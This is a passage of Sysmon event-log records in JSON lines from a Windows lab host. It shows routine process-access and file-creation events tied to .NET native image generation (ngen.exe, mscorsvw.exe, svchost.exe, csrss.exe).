{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8268,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.662\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22BC-5F25-0000-001045FB1000}\r\nTargetProcessId: 4592\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.662","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22BC-5F25-0000-001045FB1000}","TargetProcessId":"4592","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8269,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.709\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22BC-5F25-0000-0010E5FE1000}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.709","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22BC-5F25-0000-0010E5FE1000}","TargetProcessId":"1164","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8270,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.709\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BC-5F25-0000-0010E5FE1000}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.709","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BC-5F25-0000-0010E5FE1000}","TargetProcessId":"1164","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8271,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.725\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22BC-5F25-0000-0010E5FE1000}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.725","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22BC-5F25-0000-0010E5FE1000}","TargetProcessId":"1164","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8272,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:25.053\r\nProcessGuid: {41C8662E-22BC-5F25-0000-0010E5FE1000}\r\nProcessId: 1164\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\48c-0\\UIAutomationClient.dll\r\nCreationUtcTime: 2020-08-01 08:07:25.053","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:25.053","ProcessGuid":"{41C8662E-22BC-5F25-0000-0010E5FE1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\48c-0\\UIAutomationClient.dll","CreationUtcTime":"2020-08-01 08:07:25.053","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8273,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:25.100\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2293-5F25-0000-00105FB50F00}\r\nTargetProcessId: 2912\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:25.100","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2293-5F25-0000-00105FB50F00}","TargetProcessId":"2912","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8274,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:25.100\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2293-5F25-0000-00105FB50F00}\r\nTargetProcessId: 2912\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:25.100","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2293-5F25-0000-00105FB50F00}","TargetProcessId":"2912","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8275,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:25.100\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2293-5F25-0000-00105FB50F00}\r\nTargetProcessId: 2912\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:25.100","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2293-5F25-0000-00105FB50F00}","TargetProcessId":"2912","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8276,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:25.193\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22BD-5F25-0000-0010A5061100}\r\nTargetProcessId: 4364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 